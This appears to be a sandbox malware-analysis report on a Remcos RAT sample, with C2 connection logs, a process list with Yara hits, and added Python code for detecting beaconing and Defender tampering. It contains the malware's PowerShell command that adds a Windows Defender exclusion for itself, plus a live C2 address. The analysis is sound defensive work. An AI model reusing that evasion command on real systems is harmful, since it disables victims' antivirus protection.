                      Jan 9, 2025 12:42:13.506479025 CET24045003187.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:14.042917967 CET500322404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:14.047986984 CET24045003287.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:14.048079014 CET500322404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:14.051681995 CET500322404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:14.056716919 CET24045003287.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:15.668986082 CET24045003287.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:15.669064045 CET500322404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:15.669092894 CET500322404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:15.673886061 CET24045003287.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:16.182635069 CET500332404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:16.187556028 CET24045003387.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:16.188689947 CET500332404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:16.192156076 CET500332404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:16.196996927 CET24045003387.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:17.809753895 CET24045003387.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:17.809850931 CET500332404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:17.809931040 CET500332404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:17.814696074 CET24045003387.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:18.308052063 CET500342404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:18.313034058 CET24045003487.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:18.315711975 CET500342404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:18.319048882 CET500342404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:18.323889971 CET24045003487.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:19.929598093 CET24045003487.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:19.929670095 CET500342404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:19.929712057 CET500342404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:19.935034037 CET24045003487.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:20.417454958 CET500352404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:20.422550917 CET24045003587.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:20.422861099 CET500352404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:20.426491022 CET500352404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:20.431276083 CET24045003587.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:22.245940924 CET24045003587.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:22.246310949 CET500352404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:22.246671915 CET500352404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:22.251502991 CET24045003587.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:22.714171886 CET500362404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:22.719155073 CET24045003687.120.116.245192.168.2.5
                      Jan 9, 2025 12:42:22.720747948 CET500362404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:22.724292994 CET500362404192.168.2.587.120.116.245
                      Jan 9, 2025 12:42:22.729167938 CET24045003687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:47.057473898 CET24045008087.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:47.057658911 CET500802404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:47.057899952 CET500802404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:47.062663078 CET24045008087.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:47.168771029 CET500812404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:47.173705101 CET24045008187.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:47.173809052 CET500812404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:47.178067923 CET500812404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:47.182843924 CET24045008187.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:48.803903103 CET24045008187.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:48.804025888 CET500812404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:48.804115057 CET500812404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:48.808877945 CET24045008187.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:48.901674986 CET500822404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:48.906554937 CET24045008287.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:48.906699896 CET500822404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:48.910198927 CET500822404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:48.915011883 CET24045008287.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:50.545871019 CET24045008287.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:50.545968056 CET500822404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:50.546009064 CET500822404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:50.550776958 CET24045008287.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:50.651595116 CET500832404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:50.656495094 CET24045008387.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:50.656579018 CET500832404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:50.660459042 CET500832404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:50.665348053 CET24045008387.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:52.259924889 CET24045008387.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:52.260025978 CET500832404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:52.260076046 CET500832404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:52.264883041 CET24045008387.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:52.354774952 CET500842404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:52.359721899 CET24045008487.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:52.359798908 CET500842404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:52.363303900 CET500842404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:52.368071079 CET24045008487.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:53.981933117 CET24045008487.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:53.981993914 CET500842404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:53.982047081 CET500842404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:53.986865997 CET24045008487.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:54.073484898 CET500852404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:54.078346968 CET24045008587.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:54.078461885 CET500852404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:54.081756115 CET500852404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:54.086543083 CET24045008587.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:55.701385021 CET24045008587.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:55.701456070 CET500852404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:55.701553106 CET500852404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:55.706341982 CET24045008587.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:55.792217016 CET500862404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:55.797280073 CET24045008687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:55.799984932 CET500862404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:55.803524971 CET500862404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:55.808425903 CET24045008687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:57.419488907 CET24045008687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:57.419559956 CET500862404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:57.419611931 CET500862404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:57.424390078 CET24045008687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:57.511043072 CET500872404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:57.516026020 CET24045008787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:57.521028996 CET500872404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:57.524334908 CET500872404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:57.529171944 CET24045008787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:59.159403086 CET24045008787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:59.159624100 CET500872404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:59.159624100 CET500872404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:59.164527893 CET24045008787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:59.245270014 CET500882404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:59.250226021 CET24045008887.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:59.250309944 CET500882404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:59.253617048 CET500882404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:59.258430958 CET24045008887.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:00.893310070 CET24045008887.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:00.893430948 CET500882404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:00.893517971 CET500882404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:00.898302078 CET24045008887.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:00.979839087 CET500892404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:00.984850883 CET24045008987.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:00.984950066 CET500892404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:00.988250017 CET500892404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:00.993118048 CET24045008987.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:02.572386026 CET24045008987.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:02.572468042 CET500892404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:02.572496891 CET500892404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:02.577276945 CET24045008987.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:02.651772022 CET500902404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:02.656689882 CET24045009087.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:02.656780958 CET500902404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:02.660972118 CET500902404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:02.665774107 CET24045009087.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:04.300842047 CET24045009087.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:04.300919056 CET500902404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:04.300971985 CET500902404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:04.305871010 CET24045009087.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:04.386225939 CET500912404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:04.391244888 CET24045009187.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:04.397033930 CET500912404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:04.400410891 CET500912404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:04.405291080 CET24045009187.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:06.013175964 CET24045009187.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:06.013243914 CET500912404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:06.013281107 CET500912404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:06.018088102 CET24045009187.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:06.089173079 CET500922404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:06.094959974 CET24045009287.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:06.096841097 CET500922404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:06.100370884 CET500922404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:06.106375933 CET24045009287.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:07.713512897 CET24045009287.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:07.713576078 CET500922404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:07.713711977 CET500922404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:07.718475103 CET24045009287.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:07.792275906 CET500932404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:07.797322989 CET24045009387.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:07.797410011 CET500932404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:07.801106930 CET500932404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:07.805952072 CET24045009387.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:09.440314054 CET24045009387.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:09.440522909 CET500932404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:09.440649033 CET500932404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:09.445451975 CET24045009387.120.116.245192.168.2.5
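The rows above show the sample opening a fresh TCP connection from a new ephemeral port (50075, 50076, 50077, ...) to 87.120.116.245:2404, the remote side tearing each one down about 1.6 s later, and the next connection following within roughly 0.1 s, so a new flow to the same host and port starts about every 1.7 s. A fixed-interval reconnect like this is the beaconing pattern to hunt for when looking for a Remcos C2 channel in flow logs. The Python below is an added example, not part of the Joe Sandbox report: it reads rows in the delimiter-free form in which this table exports to text (source port, destination port, source IP and destination IP run together after the timezone), enumerates every legal split into two ports and two dotted quads, resolves the remaining ambiguity by requiring the reverse direction of the same flow to have been seen unambiguously, and then measures the gap between successive connection starts. The guest address 192.168.2.5 and the nine sample rows are taken from the table; `EPOCH` and the function names are this example's own.

```python
import re
from datetime import datetime

# The sandbox guest's address (assumption: 192.168.2.5, the only RFC 1918
# address in the table); it anchors which side of each row is "local".
LOCAL_IP = "192.168.2.5"

# Nine rows of the packet table above, in the delimiter-free form produced
# when the HTML table is exported to text: timestamp, then source port,
# destination port, source IP and destination IP run together.
SAMPLE_ROWS = """
Jan 9, 2025 12:43:38.456716061 CET500762404192.168.2.587.120.116.245
Jan 9, 2025 12:43:38.461671114 CET24045007687.120.116.245192.168.2.5
Jan 9, 2025 12:43:38.462958097 CET500762404192.168.2.587.120.116.245
Jan 9, 2025 12:43:40.198455095 CET500772404192.168.2.587.120.116.245
Jan 9, 2025 12:43:40.203486919 CET24045007787.120.116.245192.168.2.5
Jan 9, 2025 12:43:40.203615904 CET500772404192.168.2.587.120.116.245
Jan 9, 2025 12:43:41.952678919 CET500782404192.168.2.587.120.116.245
Jan 9, 2025 12:43:41.957618952 CET24045007887.120.116.245192.168.2.5
Jan 9, 2025 12:43:41.957801104 CET500782404192.168.2.587.120.116.245
"""

ROW_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) "
                    r"(?P<tz>[A-Z]+)(?P<blob>\d[\d.]+)$")
EPOCH = datetime(2025, 1, 1)   # arbitrary fixed reference; only differences are used


def _valid_port(s):
    return s.isdigit() and not s.startswith("0") and int(s) <= 65535


def _valid_octet(s):
    return s.isdigit() and (s == "0" or not s.startswith("0")) and int(s) <= 255


def _ip_splits(tail):
    """'192.168.2.587.120.116.245' -> every (src, dst) split of the fused middle octet."""
    parts = tail.split(".")
    if len(parts) != 7:
        return
    mid = parts[3]
    for k in range(1, len(mid)):
        src, dst = parts[:3] + [mid[:k]], [mid[k:]] + parts[4:]
        if all(_valid_octet(o) for o in src + dst):
            yield ".".join(src), ".".join(dst)


def candidates(blob, local_ip=None):
    """All legal (sport, dport, src, dst) readings of a fused column blob."""
    dot = blob.index(".")
    out = []
    for o1 in (1, 2, 3):                       # length of the first octet of src
        if dot - o1 < 0:
            break
        ports = blob[:dot - o1]
        for ls in range(1, 6):                 # length of the source port
            sp, dp = ports[:ls], ports[ls:]
            if _valid_port(sp) and _valid_port(dp):
                for src, dst in _ip_splits(blob[dot - o1:]):
                    if local_ip is None or local_ip in (src, dst):
                        out.append((int(sp), int(dp), src, dst))
    return out


def parse_packets(text, local_ip=None):
    """Parse rows, then resolve ambiguous port splits using the reply direction."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        dt = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
        secs = (dt - EPOCH).total_seconds() + int(m["frac"][:9].ljust(9, "0")) / 1e9
        rows.append({"t": secs, "cands": candidates(m["blob"], local_ip), "tuple": None})
    # Pass 1: rows with exactly one legal reading are trusted as-is.
    known = {r["cands"][0] for r in rows if len(r["cands"]) == 1}
    # Pass 2: an ambiguous row keeps the reading whose mirror image (the other
    # direction of the same flow) was seen unambiguously; otherwise it stays None.
    for r in rows:
        if len(r["cands"]) == 1:
            r["tuple"] = r["cands"][0]
        else:
            mirrored = [c for c in r["cands"] if (c[1], c[0], c[3], c[2]) in known]
            r["tuple"] = mirrored[0] if len(mirrored) == 1 else None
    return rows


def beacon_intervals(rows, local_ip):
    """Group packets into flows by local port; return flow starts and the gaps between them."""
    first = {}
    for r in rows:
        if r["tuple"] is None:
            continue
        sp, dp, src, dst = r["tuple"]
        key = (sp, dst, dp) if src == local_ip else (dp, src, sp)   # (local port, remote ip, remote port)
        first[key] = min(first.get(key, r["t"]), r["t"])
    starts = sorted(first.items(), key=lambda kv: kv[1])
    gaps = [b[1] - a[1] for a, b in zip(starts, starts[1:])]
    return starts, gaps


if __name__ == "__main__":
    starts, gaps = beacon_intervals(parse_packets(SAMPLE_ROWS, LOCAL_IP), LOCAL_IP)
    for (lport, rip, rport), t in starts:
        print(f"local:{lport} -> {rip}:{rport} at +{t - starts[0][1]:.3f}s")
    print("reconnect gaps (s):", [round(g, 3) for g in gaps])
```

The mirror-image step matters: "500762404" reads equally well as 5007/62404 and as 50076/2404, and only the unambiguous reply rows (2404 back to 50076) settle it. On a full capture the same grouping by local port gives one start time per connection, and a low variance in the gaps between them is the beacon signal.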


                      Target ID:0
                      Start time:06:39:59
                      Start date:09/01/2025
                      Path:C:\Users\user\Desktop\Material requirements_1.pif.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Material requirements_1.pif.exe"
                      Imagebase:0x990000
                      File size:969'728 bytes
                      MD5 hash:B10DBC0225AAC52E8EE344602847A3CC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      Target ID:3
                      Start time:06:40:02
                      Start date:09/01/2025
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                      Imagebase:0x180000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:06:40:02
                      Start date:09/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:5
                      Start time:06:40:02
                      Start date:09/01/2025
                      Path:C:\Users\user\Desktop\Material requirements_1.pif.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\Desktop\Material requirements_1.pif.exe"
                      Imagebase:0x2f0000
                      File size:969'728 bytes
                      MD5 hash:B10DBC0225AAC52E8EE344602847A3CC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:6
                      Start time:06:40:02
                      Start date:09/01/2025
                      Path:C:\Users\user\Desktop\Material requirements_1.pif.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\Desktop\Material requirements_1.pif.exe"
                      Imagebase:0x170000
                      File size:969'728 bytes
                      MD5 hash:B10DBC0225AAC52E8EE344602847A3CC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:7
                      Start time:06:40:02
                      Start date:09/01/2025
                      Path:C:\Users\user\Desktop\Material requirements_1.pif.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Material requirements_1.pif.exe"
                      Imagebase:0xac0000
                      File size:969'728 bytes
                      MD5 hash:B10DBC0225AAC52E8EE344602847A3CC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:false

                      Target ID:9
                      Start time:06:40:42
                      Start date:09/01/2025
                      Path:C:\Windows\System32\wbem\WMIADAP.exe
                      Wow64 process (32bit):false
                      Commandline:wmiadap.exe /F /T /R
                      Imagebase:0x7ff75c160000
                      File size:182'272 bytes
                      MD5 hash:1BFFABBD200C850E6346820E92B915DC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true
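Three facts in the process list above are the ones a detection engineer would encode: the PowerShell child (target 3) runs Add-MpPreference -ExclusionPath against the sample's own path, which is the "Adds a directory exclusion to Windows Defender" signature from the overview (T1562.001); the sample starts three further copies of itself with an identical command line (targets 5, 6 and 7), of which only target 7 is still running; and target 7's Remcos Yara hit is at offset 0x400000 while its reported image base is 0xac0000, so the matched code is not at the process's own mapped image. The Python below is an added example, not code from the report or from Joe Security: it parses an excerpt of these records in the Key:Value layout shown above (Yara lines keep their bullet) and implements those three checks. The field names it reads are the report's; the function names and the `shields_tree_member` flag are this example's own.

```python
import re
from collections import defaultdict

# Excerpt of the process records above (targets 0, 3, 5 and 7), trimmed to the
# fields the checks below use; the "Key:Value" layout is the report's own.
PROCESS_LOG = r"""
Target ID:0
Path:C:\Users\user\Desktop\Material requirements_1.pif.exe
Commandline:"C:\Users\user\Desktop\Material requirements_1.pif.exe"
Imagebase:0x990000
MD5 hash:B10DBC0225AAC52E8EE344602847A3CC
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:3
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe"
Imagebase:0x180000
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has exited:true

Target ID:5
Path:C:\Users\user\Desktop\Material requirements_1.pif.exe
Commandline:"C:\Users\user\Desktop\Material requirements_1.pif.exe"
Imagebase:0x2f0000
MD5 hash:B10DBC0225AAC52E8EE344602847A3CC
Has exited:true

Target ID:7
Path:C:\Users\user\Desktop\Material requirements_1.pif.exe
Commandline:"C:\Users\user\Desktop\Material requirements_1.pif.exe"
Imagebase:0xac0000
MD5 hash:B10DBC0225AAC52E8EE344602847A3CC
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:false
"""

# A quoted path stops at the closing quote; an unquoted one runs to end of line.
EXCLUSION_RE = re.compile(r'Add-MpPreference\s.*?-Exclusion(Path|Process|Extension)\s+"?([^"]+)"?', re.I)


def parse_process_records(text):
    """Split the report's process listing into dicts; '•' lines become the 'yara' list."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if cur:
                records.append(cur)
            cur = None
        elif line.startswith("•") and cur is not None:
            cur.setdefault("yara", []).append(dict(re.findall(r"(\w+): ([^,]+)", line)))
        else:
            key, _, value = line.partition(":")      # first colon only: paths contain "C:\"
            if cur is None:
                cur = {}
            cur[key.strip()] = value.strip()
    if cur:
        records.append(cur)
    return records


def find_defender_exclusions(records):
    """T1562.001: a process adding a Defender exclusion, and whether it shields a process in this tree."""
    tree_paths = {r.get("Path", "").lower() for r in records}
    hits = []
    for r in records:
        m = EXCLUSION_RE.search(r.get("Commandline", ""))
        if m:
            excluded = m.group(2).strip()
            hits.append({"target": r["Target ID"], "kind": m.group(1), "excluded": excluded,
                         "shields_tree_member": excluded.lower() in tree_paths})
    return hits


def find_self_relaunches(records):
    """Same image, hash and command line started repeatedly: a loader spawning copies of itself."""
    groups = defaultdict(list)
    for r in records:
        groups[(r.get("Path"), r.get("MD5 hash"), r.get("Commandline"))].append(r["Target ID"])
    return {path: ids for (path, _, _), ids in groups.items() if len(ids) >= 2}


def find_out_of_image_yara(records, rule_substr="Remcos"):
    """Yara hits whose dump offset (4th dotted field of the source name) is not the process's image base."""
    out = []
    for r in records:
        base = int(r.get("Imagebase", "0"), 16)
        for y in r.get("yara", []):
            if rule_substr.lower() in y["Rule"].lower():
                offset = int(y["Source"].split(".")[3], 16)
                if offset != base:
                    out.append((r["Target ID"], y["Rule"], hex(offset), hex(base)))
    return out


if __name__ == "__main__":
    recs = parse_process_records(PROCESS_LOG)
    print("defender exclusions:", find_defender_exclusions(recs))
    print("self relaunches:", find_self_relaunches(recs))
    print("yara outside image base:", find_out_of_image_yara(recs))
```

The offset is taken from the dump name because the report itself uses that field as the dump offset (see the "Memory Dump Source" line further down, where the fourth field 0000000007120000 is reported as Offset: 07120000); the other fields of the name are not interpreted here. The self-relaunch check deliberately keys on the full command line as well as the hash, so a loader that re-executes itself with an extra argument is reported separately from one that does not.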


                        Execution Graph

                        Execution Coverage:11.2%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:3.8%
                        Total number of Nodes:208
                        Total number of Limit Nodes:8
